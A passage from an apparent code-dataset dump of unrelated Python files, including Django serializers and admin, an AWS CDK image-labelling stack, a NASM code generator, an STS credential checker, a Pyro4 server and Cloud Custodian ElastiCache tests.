    # convolve 2d with mask
    print(convovle_matrix2d(a, 0.8))
    # Filter an image with the 2-D mask.  BUG FIX: `np.float` was removed
    # in NumPy >= 1.24; use the builtin float dtype instead.
    image = np.array(Image.open("./lena.jpg"), dtype=float)
    result = convovle_matrix2d(image, 0.8).astype(np.uint8)
    plt.imshow(result)
    plt.show()


gaussian_filter()
24,635 | 53a2dd86a39ce5d8aff1379fa3b9476f14e49997 | from rest_framework import serializers
from rest_framework.validators import UniqueTogetherValidator
from posts.models import Comment, Group, Post, User, Follow
class GroupSerializer(serializers.ModelSerializer):
    """Expose every field of the Group model."""

    class Meta:
        model = Group
        fields = '__all__'
class CommentSerializer(serializers.ModelSerializer):
    """Serialize a Comment; author renders as a username, post is read-only."""

    author = serializers.SlugRelatedField(read_only=True, slug_field='username')

    class Meta:
        model = Comment
        fields = '__all__'
        read_only_fields = ['post']
class PostSerializer(serializers.ModelSerializer):
    """Serialize a Post; pub_date is exposed as a date-only publication_date."""

    author = serializers.SlugRelatedField(read_only=True, slug_field='username')
    # NOTE(review): SerializerMethodField takes its value from
    # get_publication_date(), so the `source` kwarg looks redundant — confirm
    # it can be dropped.
    publication_date = serializers.SerializerMethodField(source='pub_date')

    class Meta:
        model = Post
        exclude = ('pub_date',)

    def get_publication_date(self, obj):
        """Render only the date part of the publication timestamp."""
        return obj.pub_date.date()
class UserSerializer(serializers.ModelSerializer):
    """Serialize a User together with the ids of their posts."""

    posts = serializers.SlugRelatedField(many=True, read_only=True, slug_field='id')

    class Meta:
        model = User
        fields = ('id', 'username', 'posts')
class FollowSerializer(serializers.ModelSerializer):
    """Subscription of the current user to another author (unique pair,
    self-subscription rejected)."""

    user = serializers.SlugRelatedField(
        read_only=True,
        slug_field='username',
        default=serializers.CurrentUserDefault(),
    )
    author = serializers.SlugRelatedField(
        queryset=User.objects.all(),
        slug_field='username',
    )

    class Meta:
        model = Follow
        fields = ('id', 'user', 'author')
        validators = [
            UniqueTogetherValidator(
                queryset=Follow.objects.all(),
                fields=['user', 'author'],
            )
        ]

    def validate_author(self, value):
        """Reject subscribing to oneself."""
        if self.context['request'].user == value:
            raise serializers.ValidationError('На себя нельзя подписываться')
        return value
|
24,636 | 67d83d9090b7081787d8bc0569a437e56076607e | from aws_cdk import (
aws_lambda as _lambda,
aws_s3_notifications as _s3notification,
aws_lambda_event_sources as _lambda_event_source,
aws_s3 as _s3,
aws_cognito as _cognito,
aws_sqs as _sqs,
aws_apigateway as _apigw,
aws_iam as _iam,
aws_events as _events,
aws_events_targets as _event_targets,
aws_ec2 as _ec2,
aws_rds as _rds,
aws_secretsmanager as _secrets_manager,
custom_resources as _custom_resources,
core
)
from aws_cdk.core import CustomResource
from aws_cdk.custom_resources import (
AwsCustomResource,
AwsCustomResourcePolicy,
AwsSdkCall,
PhysicalResourceId,
Provider
)
# read config file
# create first user of the cognito user pool?
class VaquitaStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
### S3 core
imagesS3Bucket = _s3.Bucket(self, "VAQUITA_IMAGES")
imagesS3Bucket.add_cors_rule(
allowed_methods=[_s3.HttpMethods.POST],
allowed_origins=["*"] # add API gateway web resource URL
)
### SQS core
imageDeadletterQueue = _sqs.Queue(self, "VAQUITA_IMAGES_DEADLETTER_QUEUE")
imageQueue = _sqs.Queue(self, "VAQUITA_IMAGES_QUEUE",
dead_letter_queue={
"max_receive_count": 3,
"queue": imageDeadletterQueue
})
### api gateway core
apiGateway = _apigw.RestApi(self, 'VAQUITA_API_GATEWAY', rest_api_name='VaquitaApiGateway')
apiGatewayResource = apiGateway.root.add_resource('vaquita')
apiGatewayLandingPageResource = apiGatewayResource.add_resource('web')
apiGatewayGetSignedUrlResource = apiGatewayResource.add_resource('signedUrl')
apiGatewayImageSearchResource = apiGatewayResource.add_resource('search')
### landing page function
getLandingPageFunction = _lambda.Function(self, "VAQUITA_GET_LANDING_PAGE",
function_name="VAQUITA_GET_LANDING_PAGE",
runtime=_lambda.Runtime.PYTHON_3_7,
handler="main.handler",
code=_lambda.Code.asset("./src/landingPage"))
getLandingPageIntegration = _apigw.LambdaIntegration(
getLandingPageFunction,
proxy=True,
integration_responses=[{
'statusCode': '200',
'responseParameters': {
'method.response.header.Access-Control-Allow-Origin': "'*'",
}
}])
apiGatewayLandingPageResource.add_method('GET', getLandingPageIntegration,
method_responses=[{
'statusCode': '200',
'responseParameters': {
'method.response.header.Access-Control-Allow-Origin': True,
}
}])
### cognito
required_attribute = _cognito.StandardAttribute(required=True)
usersPool = _cognito.UserPool(self, "VAQUITA_USERS_POOL",
auto_verify=_cognito.AutoVerifiedAttrs(email=True), #required for self sign-up
standard_attributes=_cognito.StandardAttributes(email=required_attribute), #required for self sign-up
self_sign_up_enabled=True)
userPoolAppClient = _cognito.CfnUserPoolClient(self, "VAQUITA_USERS_POOL_APP_CLIENT",
supported_identity_providers=["COGNITO"],
allowed_o_auth_flows=["implicit"],
allowed_o_auth_scopes=["phone", "email", "openid", "profile"],
user_pool_id=usersPool.user_pool_id,
callback_ur_ls=[apiGatewayLandingPageResource.url],
allowed_o_auth_flows_user_pool_client=True,
explicit_auth_flows=["ALLOW_REFRESH_TOKEN_AUTH"])
userPoolDomain = _cognito.UserPoolDomain(self, "VAQUITA_USERS_POOL_DOMAIN",
user_pool=usersPool,
cognito_domain=_cognito.CognitoDomainOptions(domain_prefix="vaquita"))
### get signed URL function
getSignedUrlFunction = _lambda.Function(self, "VAQUITA_GET_SIGNED_URL",
function_name="VAQUITA_GET_SIGNED_URL",
environment={"VAQUITA_IMAGES_BUCKET": imagesS3Bucket.bucket_name},
runtime=_lambda.Runtime.PYTHON_3_7,
handler="main.handler",
code=_lambda.Code.asset("./src/getSignedUrl"))
getSignedUrlIntegration = _apigw.LambdaIntegration(
getSignedUrlFunction,
proxy=True,
integration_responses=[{
'statusCode': '200',
'responseParameters': {
'method.response.header.Access-Control-Allow-Origin': "'*'",
}
}])
apiGatewayGetSignedUrlAuthorizer = _apigw.CfnAuthorizer(self, "VAQUITA_API_GATEWAY_GET_SIGNED_URL_AUTHORIZER",
rest_api_id=apiGatewayGetSignedUrlResource.rest_api.rest_api_id,
name="VAQUITA_API_GATEWAY_GET_SIGNED_URL_AUTHORIZER",
type="COGNITO_USER_POOLS", #_apigw.AuthorizationType.COGNITO,
identity_source="method.request.header.Authorization",
provider_arns=[usersPool.user_pool_arn])
apiGatewayGetSignedUrlResource.add_method('GET', getSignedUrlIntegration,
authorization_type=_apigw.AuthorizationType.COGNITO,
method_responses=[{
'statusCode': '200',
'responseParameters': {
'method.response.header.Access-Control-Allow-Origin': True,
}
}]
).node.find_child('Resource').add_property_override('AuthorizerId', apiGatewayGetSignedUrlAuthorizer.ref)
imagesS3Bucket.grant_put(getSignedUrlFunction, objects_key_pattern="new/*")
### image massage function
imageMassageFunction = _lambda.Function(self, "VAQUITA_IMAGE_MASSAGE",
function_name="VAQUITA_IMAGE_MASSAGE",
timeout=core.Duration.seconds(6),
runtime=_lambda.Runtime.PYTHON_3_7,
environment={"VAQUITA_IMAGE_MASSAGE": imageQueue.queue_name},
handler="main.handler",
code=_lambda.Code.asset("./src/imageMassage"))
imagesS3Bucket.grant_write(imageMassageFunction, "processed/*")
imagesS3Bucket.grant_delete(imageMassageFunction, "new/*")
imagesS3Bucket.grant_read(imageMassageFunction, "new/*")
newImageAddedNotification = _s3notification.LambdaDestination(imageMassageFunction)
imagesS3Bucket.add_event_notification(_s3.EventType.OBJECT_CREATED,
newImageAddedNotification,
_s3.NotificationKeyFilter(prefix="new/")
)
imageQueue.grant_send_messages(imageMassageFunction)
### image analyzer function
imageAnalyzerFunction = _lambda.Function(self, "VAQUITA_IMAGE_ANALYSIS",
function_name="VAQUITA_IMAGE_ANALYSIS",
runtime=_lambda.Runtime.PYTHON_3_7,
timeout=core.Duration.seconds(10),
environment={
"VAQUITA_IMAGES_BUCKET": imagesS3Bucket.bucket_name,
"REGION": core.Aws.REGION,
},
handler="main.handler",
code=_lambda.Code.asset("./src/imageAnalysis"))
imageAnalyzerFunction.add_event_source(_lambda_event_source.SqsEventSource(queue=imageQueue, batch_size=10))
imageQueue.grant_consume_messages(imageMassageFunction)
lambda_rekognition_access = _iam.PolicyStatement(
effect=_iam.Effect.ALLOW,
actions=["rekognition:DetectLabels", "rekognition:DetectModerationLabels"],
resources=["*"]
)
imageAnalyzerFunction.add_to_role_policy(lambda_rekognition_access)
imagesS3Bucket.grant_read(imageAnalyzerFunction, "processed/*")
### API gateway finalizing
self.add_cors_options(apiGatewayGetSignedUrlResource)
self.add_cors_options(apiGatewayLandingPageResource)
self.add_cors_options(apiGatewayImageSearchResource)
### secret manager
database_secret = _secrets_manager.Secret(self, "VAQUITA_DATABASE_SECRET",
secret_name="rds-db-credentials/vaquita-rds-secret",
generate_secret_string=_secrets_manager.SecretStringGenerator(
generate_string_key='password',
secret_string_template='{"username": "dba"}',
require_each_included_type=True
)
)
database = _rds.CfnDBCluster(self, "VAQUITA_DATABASE",
engine=_rds.DatabaseClusterEngine.aurora_mysql(version=_rds.AuroraMysqlEngineVersion.VER_5_7_12).engine_type,
engine_mode="serverless",
# availability_zones=vpc.availability_zones,
database_name="images_labels",
enable_http_endpoint=True,
deletion_protection=False,
# enable_cloudwatch_logs_exports=["error"],
master_username=database_secret.secret_value_from_json("username").to_string(),
master_user_password=database_secret.secret_value_from_json("password").to_string(),
scaling_configuration=_rds.CfnDBCluster.ScalingConfigurationProperty(
auto_pause=True,
min_capacity=2,
max_capacity=8,
seconds_until_auto_pause=1800
),
)
database_cluster_arn = "arn:aws:rds:{}:{}:cluster:{}".format(core.Aws.REGION, core.Aws.ACCOUNT_ID, database.ref)
### secret manager
secret_target = _secrets_manager.CfnSecretTargetAttachment(self,"VAQUITA_DATABASE_SECRET_TARGET",
target_type="AWS::RDS::DBCluster",
target_id=database.ref,
secret_id=database_secret.secret_arn
)
secret_target.node.add_dependency(database)
### database function
image_data_function_role = _iam.Role(self, "VAQUITA_IMAGE_DATA_FUNCTION_ROLE",
role_name="VAQUITA_IMAGE_DATA_FUNCTION_ROLE",
assumed_by=_iam.ServicePrincipal("lambda.amazonaws.com"),
managed_policies=[
_iam.ManagedPolicy.from_aws_managed_policy_name("service-role/AWSLambdaVPCAccessExecutionRole"),
_iam.ManagedPolicy.from_aws_managed_policy_name("service-role/AWSLambdaBasicExecutionRole"),
_iam.ManagedPolicy.from_aws_managed_policy_name("AmazonRDSDataFullAccess")
]
)
image_data_function = _lambda.Function(self, "VAQUITA_IMAGE_DATA",
function_name="VAQUITA_IMAGE_DATA",
runtime=_lambda.Runtime.PYTHON_3_7,
timeout=core.Duration.seconds(5),
role=image_data_function_role,
# vpc=vpc,
# vpc_subnets=_ec2.SubnetSelection(subnet_type=_ec2.SubnetType.ISOLATED),
environment={
"CLUSTER_ARN": database_cluster_arn,
"CREDENTIALS_ARN": database_secret.secret_arn,
"DB_NAME": database.database_name,
"REGION": core.Aws.REGION
},
handler="main.handler",
code=_lambda.Code.asset("./src/imageData")
)
imageSearchIntegration = _apigw.LambdaIntegration(
image_data_function,
proxy=True,
integration_responses=[{
'statusCode': '200',
'responseParameters': {
'method.response.header.Access-Control-Allow-Origin': "'*'",
}
}])
apiGatewayImageSearchAuthorizer = _apigw.CfnAuthorizer(self, "VAQUITA_API_GATEWAY_IMAGE_SEARCH_AUTHORIZER",
rest_api_id=apiGatewayImageSearchResource.rest_api.rest_api_id,
name="VAQUITA_API_GATEWAY_IMAGE_SEARCH_AUTHORIZER",
type="COGNITO_USER_POOLS", #_apigw.AuthorizationType.COGNITO,
identity_source="method.request.header.Authorization",
provider_arns=[usersPool.user_pool_arn])
apiGatewayImageSearchResource.add_method('POST', imageSearchIntegration,
authorization_type=_apigw.AuthorizationType.COGNITO,
method_responses=[{
'statusCode': '200',
'responseParameters': {
'method.response.header.Access-Control-Allow-Origin': True,
}
}]
).node.find_child('Resource').add_property_override('AuthorizerId', apiGatewayImageSearchAuthorizer.ref)
lambda_access_search = _iam.PolicyStatement(
effect=_iam.Effect.ALLOW,
actions=["translate:TranslateText"],
resources=["*"] #tbc [elasticSearch.attr_arn]
)
image_data_function.add_to_role_policy(lambda_access_search)
### custom resource
lambda_provider = Provider(self, 'VAQUITA_IMAGE_DATA_PROVIDER',
on_event_handler=image_data_function
)
CustomResource(self, 'VAQUITA_IMAGE_DATA_RESOURCE',
service_token=lambda_provider.service_token,
pascal_case_properties=False,
resource_type="Custom::SchemaCreation",
properties={
"source": "Cloudformation"
}
)
### event bridge
event_bus = _events.EventBus(self, "VAQUITA_IMAGE_CONTENT_BUS")
event_rule = _events.Rule(self, "VAQUITA_IMAGE_CONTENT_RULE",
rule_name="VAQUITA_IMAGE_CONTENT_RULE",
description="The event from image analyzer to store the data",
event_bus=event_bus,
event_pattern=_events.EventPattern(resources=[imageAnalyzerFunction.function_arn]),
)
event_rule.add_target(_event_targets.LambdaFunction(image_data_function))
event_bus.grant_put_events(imageAnalyzerFunction)
imageAnalyzerFunction.add_environment("EVENT_BUS", event_bus.event_bus_name)
### outputs
core.CfnOutput(self, 'CognitoHostedUILogin',
value='https://{}.auth.{}.amazoncognito.com/login?client_id={}&response_type=token&scope={}&redirect_uri={}'.format(userPoolDomain.domain_name, core.Aws.REGION, userPoolAppClient.ref, '+'.join(userPoolAppClient.allowed_o_auth_scopes), apiGatewayLandingPageResource.url),
description='The Cognito Hosted UI Login Page'
)
def add_cors_options(self, apigw_resource):
    """Attach a CORS preflight OPTIONS method (mock integration) to *apigw_resource*."""
    # Static preflight response returned by the mock integration.
    integration_response = {
        'statusCode': '200',
        'responseParameters': {
            'method.response.header.Access-Control-Allow-Headers': "'Content-Type,X-Amz-Date,Authorization,X-Api-Key,X-Amz-Security-Token'",
            'method.response.header.Access-Control-Allow-Origin': "'*'",
            'method.response.header.Access-Control-Allow-Methods': "'GET,OPTIONS'"
        }
    }
    # Declares which response headers the method is allowed to map.
    method_response = {
        'statusCode': '200',
        'responseParameters': {
            'method.response.header.Access-Control-Allow-Headers': True,
            'method.response.header.Access-Control-Allow-Methods': True,
            'method.response.header.Access-Control-Allow-Origin': True,
        }
    }
    mock_integration = _apigw.MockIntegration(
        integration_responses=[integration_response],
        passthrough_behavior=_apigw.PassthroughBehavior.WHEN_NO_MATCH,
        request_templates={"application/json": "{\"statusCode\":200}"}
    )
    apigw_resource.add_method('OPTIONS', mock_integration,
                              method_responses=[method_response],
                              )
24,637 | 141222ce83427cbac1890040636bce93085ff84b | import os
class sablon:
    """NASM x86 (32-bit Linux syscall) code generator ("sablon" = template).

    High-level calls (sleep, ekranayaz) append assembly snippets to an
    in-memory program, which save()/run() write out, assemble with nasm,
    link with ld, and execute.  NOTE: Python 2 syntax (print statement
    in ekranayaz's error branch).
    """
    def __init__(self):
        # Label suffix for unique data labels: "a", "aa", "aaa", ...
        self.ds = "a"
        self.dsayi = 0
        # .data/.text skeleton; the "{}" placeholder is repeatedly re-filled
        # with data declarations via chained str.format calls below.
        self.acilis = "section .data\n\t{}\n\nsection .text\n"
        # exit(0) syscall epilogue.
        self.kapanis = "\n\tmov eax, 1\n\txor ebx, ebx\n\tint 80h\n"
        # nanosleep (syscall 162) template; "{}" receives the seconds value.
        self.uyku = "\n\tmov dword [saniye], {}\n\tmov dword [nanosaniye], 0\n\tmov eax, 162\n\tmov ebx, forsleep\n\tmov ecx, 0\n\tint 80h\n"
        # sys_write to stdout; "{}"s receive the buffer label and its length label.
        self.yaz = "\n\tmov eax,4\n\tmov ebx, 1\n\tmov ecx, {}\n\tmov edx, {}\n\tint 80h\n"
        # Accumulated body of the generated program.
        self.ana = ""
    def default_in(self):
        # Current prologue (data section skeleton).
        return self.acilis
    def default_out(self):
        # Exit epilogue.
        return self.kapanis
    def sleep(self, uzunluk):
        """Append a sleep of *uzunluk* seconds, declaring the timespec once."""
        if "forsleep" not in self.acilis:
            # First sleep: inject the timespec struct, keeping a fresh "{}"
            # so later declarations can still be appended.
            self.acilis = self.acilis.format("{}\n\tforsleep:\n\t\tsaniye: dd 0\n\t\tnanosaniye: dd 0\n")
        self.ana += self.uyku.format(uzunluk)
        # NOTE(review): bare expression below has no effect — looks like a leftover.
        self.ana
    def ekranayaz(self, metin, son):
        """Append a write of *metin* to stdout; son=1 appends a newline, son=0 none."""
        if son == 1:
            metin += "\", 10,\""
        elif son == 0:
            pass
        else:
            # Invalid *son* value: complain and abort (message kept verbatim).
            print "bu yazdigim ilk derleme hata ayiklama blogu, hayirli ugurlu olsun"
            exit(3)
        # Declare the string and its length, then emit the write call.
        self.acilis = self.acilis.format("{}\n\tmetin"+self.ds+": db \""+metin+"\"\n\tmetin"+self.ds+"_l: equ $-metin"+self.ds+"\n")
        bir, iki = "metin"+self.ds, "metin"+self.ds+"_l"
        self.ana += self.yaz.format(bir, iki)
        self.ds += "a"
    def save(self, isim):
        """Write the generated program to <isim with .muco replaced by .asm>."""
        op = open(isim.replace(".muco", ".asm"), "w+")
        op.write(self.net())
        op.close()
    def cmd(self, co):
        # Thin shell wrapper.
        os.system(co)
    def run(self, isim):
        """Assemble (nasm), link (ld, 32-bit) and execute the .asm file *isim*."""
        saf = isim.split(".")[0]
        olu = saf+".o"
        k1 = "nasm -f elf -o {} {}".format(olu, isim)
        k2 = "ld -m elf_i386 -o {} {}".format(saf, olu)
        k3 = "./" + saf
        self.cmd(k1)
        self.cmd(k2)
        self.cmd(k3)
    def net(self):
        """Final source: prologue (leftover "{}" stripped) + body + epilogue."""
        return self.acilis.replace("{}", "")+self.ana+self.kapanis
# Demo: generate a program that sleeps 2s, prints, sleeps 3s, prints with a
# trailing newline, then assemble/link/run the result.
a = sablon()
a.sleep(2)
a.ekranayaz("iki saniye ", 0)
a.sleep(3)
a.ekranayaz("uc saniye", 1)
a.save("lemoco.muco")
a.run("lemoco.asm")
|
24,638 | b42f77560bd57b014ecdec56f0f4b66edb3e15cd | import os
import tensorflow as tf
from test_octree2col import Octree2ColTest
from test_octree_conv import OctreeConvTest
from test_octree_deconv import OctreeDeconvTest
from test_octree_property import OctreePropertyTest
from test_octree_search import OctreeSearchTest
if __name__ == "__main__":
    # Pin the run to GPU 0, then let tf.test discover and run all the
    # octree op tests imported above.
    os.environ['CUDA_VISIBLE_DEVICES'] = '0'
    tf.test.main()
24,639 | 449a5ea139cae64ae0721d94ea966c112bece5f2 | # Description: This is the Python Server to RMI Project.
# Author: Gabriel David Sacca, Vitor Bueno de Camargo
# Created at: October, 09th. 2019
# Updated at: October, 09th. 2019
import Pyro4
from Notas import Notas
# Expose the Notas class as a Pyro4 remote object under a well-known name.
daemon = Pyro4.Daemon()            # request dispatcher / listening socket
ns = Pyro4.locateNS()              # locate the running Pyro name server
uri = daemon.register(Notas)       # register the class, obtain its URI
ns.register("NotasService", uri)   # publish the URI in the name server
print("Objeto registrado.")
daemon.requestLoop()               # serve requests until interrupted
|
24,640 | 32d1b0d77d12bd86b71eb23e88389342ef46312c | from django.contrib import admin
# Register your models here.
from .models import *
class ProgressAdmin(admin.ModelAdmin):
    # Admin list view for per-student, per-question progress records.
    list_display = ('student', 'question', 'right')
    search_fields = ('student__user__username', 'question__text')
admin.site.register(Progress, ProgressAdmin)
class LessonAdmin(admin.ModelAdmin):
    # Lessons: searchable by title, description and full content.
    list_display = ('title', 'description')
    search_fields = ('title', 'description', 'content')
admin.site.register(Lesson, LessonAdmin)
class AnswerAdmin(admin.ModelAdmin):
    # Standalone answer admin (answers are also edited inline on Question).
    list_display = ('text', 'correct', 'question')
    search_fields = ('text', 'question__text')
admin.site.register(Answer, AnswerAdmin)
class StudentAdmin(admin.ModelAdmin):
    # Students listed by their linked auth user, ordered alphabetically.
    list_display = ('user',)
    search_fields = ('id', 'user__username')
    ordering = ['user']
admin.site.register(Student, StudentAdmin)
class AnswerInline(admin.StackedInline):
    # Lets answers be edited directly on the Question change page.
    model = Answer
@admin.register(Question)
class QuestionAdmin(admin.ModelAdmin):
    # Question admin with stacked inline answers.
    inlines = [
        AnswerInline,
    ]
    list_display = ('text', 'type', 'lesson')
    search_fields = ('text', 'lesson__title', 'type')
    # ordering = ['text', 'type']
|
24,641 | 213e8f771c2f2002236614f80b68b0d504af4c4d | import hondler.models
import hondler.signals
import hondler.urls |
24,642 | 6d0686fed2717a727cd9d2a81b56038d1d6a4017 | import json
import botocore
import subprocess
from av_agent_utils import okta_login
def check_sts_token_by_config(config_file):
    """Load AV-agent credentials from a config source and validate them via STS.

    *config_file* is either the literal string "run" (query the running
    agent via alienvault-agent.sh) or a path to a JSON config file,
    read as UTF-8 with a UTF-16 fallback.
    """
    if config_file == "run":
        raw = subprocess.check_output(['alienvault-agent.sh', 'config'])
    else:
        try:
            with open(config_file) as fh:
                raw = fh.read()
        except UnicodeDecodeError:
            # Some agent installs write the config as UTF-16.
            with open(config_file, encoding='utf-16') as fh:
                raw = fh.read()
    options = json.loads(raw)['options']
    return check_sts_token_by_key(
        aws_access_key_id=options['aws_access_key_id'],
        aws_secret_access_key=options['aws_secret_access_key'],
        aws_session_token=options['aws_session_token'],
    )
def check_sts_token_by_key(aws_access_key_id, aws_secret_access_key, aws_session_token):
    """Validate an STS credential triple with sts:GetCallerIdentity.

    Returns a dict with status 'success' (identity + echoed credentials)
    or 'error' (ClientError detail) so callers can branch on 'status'.
    """
    session = okta_login()
    sts = session.client(
        'sts',
        aws_access_key_id=aws_access_key_id,
        aws_secret_access_key=aws_secret_access_key,
        aws_session_token=aws_session_token,
    )
    try:
        caller = sts.get_caller_identity()
    except botocore.exceptions.ClientError as err:
        return {
            'status': 'error',
            'detail': str(err),
            'response': None,
        }
    return {
        'response': caller,
        'status': 'success',
        'aws_access_key_id': aws_access_key_id,
        'aws_secret_access_key': aws_secret_access_key,
        'aws_session_token': aws_session_token,
    }
# I never did get this to work for my use case but I'll keep it here in case it's useful
# def simulate_policy(user_arn, action_names, resource_arns):
# session = okta_login()
#
# client = session.client(
# 'iam',
# #aws_access_key_id=aws_access_key_id,
# #aws_secret_access_key=aws_secret_access_key,
# #aws_session_token=aws_session_token,
# )
#
# r = client.simulate_principal_policy(
# PolicySourceArn=user_arn,
# ActionNames=action_names,
# ResourceArns=resource_arns,
# )
# return {
# 'status': 'success',
# 'response': r,
# } |
24,643 | f2a32e4e21cba583e36b37c46744bd2664c9aed6 | # Generated by Django 2.1.8 on 2019-11-19 15:00
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial Buyer-app schema: Goods, HarvestAddress, Retail, ShoppingCart,
    ShopType and User, plus the foreign keys wiring them together."""

    initial = True

    dependencies = [
    ]

    operations = [
        # Product catalog entries (prices stored as strings).
        migrations.CreateModel(
            name='Goods',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('g_name', models.CharField(max_length=32)),
                ('g_title', models.CharField(max_length=128)),
                ('g_introduction', models.CharField(max_length=128)),
                ('g_price', models.CharField(max_length=12)),
                ('g_original_price', models.CharField(max_length=12)),
                ('g_inventory', models.IntegerField()),
                ('g_photo', models.ImageField(upload_to='images')),
                ('g_hits', models.IntegerField(blank=True, null=True)),
                ('Whether_the_hot', models.CharField(default=0, max_length=4)),
                ('Whether_the_new', models.CharField(default=0, max_length=4)),
            ],
        ),
        # Shipping addresses; 'default' flags the preferred one.
        migrations.CreateModel(
            name='HarvestAddress',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=32)),
                ('gender', models.CharField(blank=True, max_length=4, null=True)),
                ('phone_number', models.CharField(max_length=32)),
                ('address', models.CharField(max_length=128)),
                ('email', models.EmailField(blank=True, max_length=254, null=True)),
                ('default', models.CharField(default=0, max_length=4)),
            ],
        ),
        # Shops/sellers.
        migrations.CreateModel(
            name='Retail',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('r_name', models.CharField(max_length=32)),
                ('r_introduction', models.CharField(max_length=128)),
                ('r_picture', models.ImageField(blank=True, null=True, upload_to='img')),
            ],
        ),
        # Cart line items, denormalizing name/price/photo at add time.
        migrations.CreateModel(
            name='ShoppingCart',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('c_name', models.CharField(max_length=32)),
                ('c_price', models.CharField(max_length=12)),
                ('c_num', models.IntegerField()),
                ('c_photo', models.ImageField(upload_to='images')),
                ('c_price_sum', models.CharField(max_length=32)),
                ('c_add_time', models.DateTimeField()),
                ('c_inventory', models.IntegerField()),
                ('g_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Buyer.Goods')),
                ('r_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Buyer.Retail')),
            ],
        ),
        # Per-shop product categories.
        migrations.CreateModel(
            name='ShopType',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('t_classify', models.CharField(max_length=32)),
                ('t_picture', models.ImageField(upload_to='img')),
                ('r_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Buyer.Retail')),
            ],
        ),
        # App-local user accounts (not django.contrib.auth).
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('email', models.EmailField(max_length=254)),
                ('password', models.CharField(max_length=18)),
                ('username', models.CharField(blank=True, max_length=32, null=True)),
                ('age', models.CharField(blank=True, max_length=4, null=True)),
                ('gender', models.CharField(blank=True, max_length=4, null=True)),
                ('phone_number', models.CharField(blank=True, max_length=11, null=True)),
                ('picture', models.ImageField(blank=True, null=True, upload_to='img')),
                ('user_type', models.CharField(blank=True, max_length=4, null=True)),
            ],
        ),
        # FK additions deferred until the referenced models exist.
        migrations.AddField(
            model_name='shoppingcart',
            name='u_id',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Buyer.User'),
        ),
        migrations.AddField(
            model_name='goods',
            name='r_id',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Buyer.Retail'),
        ),
        migrations.AddField(
            model_name='goods',
            name='t_id',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Buyer.ShopType'),
        ),
    ]
|
24,644 | 81219c52ae768299737fb0c128ba06e277b82379 | # 2017.05.04 15:24:54 Střední Evropa (letní čas)
# Embedded file name: scripts/client/gui/Scaleform/genConsts/TEXT_ALIGN.py
class TEXT_ALIGN(object):
    """
    DO NOT MODIFY!
    Generated with yaml.
    __author__ = 'yaml_processor'
    """
    # Horizontal text-alignment constants consumed by the Scaleform UI layer.
    LEFT = 'left'
    RIGHT = 'right'
    CENTER = 'center'
# okay decompyling C:\Users\PC\wotmods\files\originals\res\packages\scripts\scripts\client\gui\Scaleform\genConsts\TEXT_ALIGN.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.05.04 15:24:54 Střední Evropa (letní čas)
|
24,645 | 6feaeeaf234efa40fba2183169e721a1eda54cfa | # Copyright 2016 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tests.common import BaseTest
class TestElastiCacheCluster(BaseTest):
    """Replay-based policy tests for the 'cache-cluster' resource:
    listing, value filtering, delete and snapshot actions."""

    def test_elasticache_cluster_simple(self):
        # Plain resource enumeration against recorded API traffic.
        session_factory = self.replay_flight_data('test_elasticache_cluster_simple')
        p = self.load_policy({
            'name': 'elasticache-cluster-simple',
            'resource': 'cache-cluster'},
            session_factory=session_factory)
        resources = p.run()
        self.assertEqual(len(resources), 4)

    def test_elasticache_cluster_simple_filter(self):
        # Value filter narrows the 4 clusters down to the memcached one.
        session_factory = self.replay_flight_data('test_elasticache_cluster_simple')
        p = self.load_policy({
            'name': 'elasticache-cluster-simple-filter',
            'resource': 'cache-cluster',
            'filters': [
                {'type': 'value',
                 'key': 'Engine',
                 'value': 'memcached'}]},
            session_factory=session_factory)
        resources = p.run()
        self.assertEqual(len(resources), 1)

    def test_elasticache_cluster_delete(self):
        # Delete action applied to the filtered memcached cluster.
        session_factory = self.replay_flight_data('test_elasticache_cluster_delete')
        p = self.load_policy({
            'name': 'elasticache-cluster-delete',
            'resource': 'cache-cluster',
            'filters': [
                {'type': 'value',
                 'key': 'Engine',
                 'value': 'memcached'}],
            'actions': [
                {'type': 'delete'}]},
            session_factory=session_factory)
        resources = p.run()
        self.assertEqual(len(resources), 1)

    def test_elasticache_cluster_snapshot(self):
        # Snapshot action over all clusters.
        session_factory = self.replay_flight_data('test_elasticache_cluster_snapshot')
        p = self.load_policy({
            'name': 'elasticache-cluster-snapshot',
            'resource': 'cache-cluster',
            'actions': [{'type': 'snapshot'}]},
            session_factory=session_factory)
        resources = p.run()
        self.assertEqual(len(resources), 4)
class TestElastiCacheSubnetGroup(BaseTest):
    """Enumeration test for the 'cache-subnet-group' resource."""

    def test_elasticache_subnet_group(self):
        session_factory = self.replay_flight_data('test_elasticache_subnet_group')
        p = self.load_policy({
            'name': 'elasticache-subnet-group',
            'resource': 'cache-subnet-group'},
            session_factory=session_factory)
        resources = p.run()
        self.assertEqual(len(resources), 1)
class TestElastiCacheSnapshot(BaseTest):
    """Replay-based tests for 'cache-snapshot': listing, age filter, delete."""

    def test_elasticache_snapshot(self):
